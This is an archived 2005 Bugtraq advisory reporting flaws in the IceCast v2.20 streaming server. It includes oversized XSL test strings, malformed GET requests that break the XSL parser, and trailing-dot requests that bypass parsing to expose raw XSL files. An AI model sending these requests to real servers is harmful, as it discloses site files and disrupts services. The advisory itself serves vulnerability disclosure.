lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050318223114.11333.qmail@www.securityfocus.com>
Date: 18 Mar 2005 22:31:14 -0000
From: Patrick <patrickthomassen@...il.com>
To: bugtraq@...urityfocus.com
Subject: IceCast up to v2.20 multiple vulnerabilities




These are tested on IceCast v2.20. This software can be freely obtained from http://www.icecast.org.

"Icecast is a streaming media server which currently supports Ogg 
Vorbis and MP3 audio streams. It can be used to create an Internet 
radio station or a privately running jukebox and many things in 
between. It is very versatile in that new formats can be added 
relatively easily and supports open standards for commuincation and 
interaction."

1) The XSL parser has some unchecked buffers (local), but they dont seem to be exploitable. If they are, they can be used for priviledge escalation, under the user that the server runs.

<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />

2) Cause XSL parser error "Could not parse XSLT file". (Not very useful).

GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0

3) XSL parser bypass. (Useful to steal customized XSL files, lol).

GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ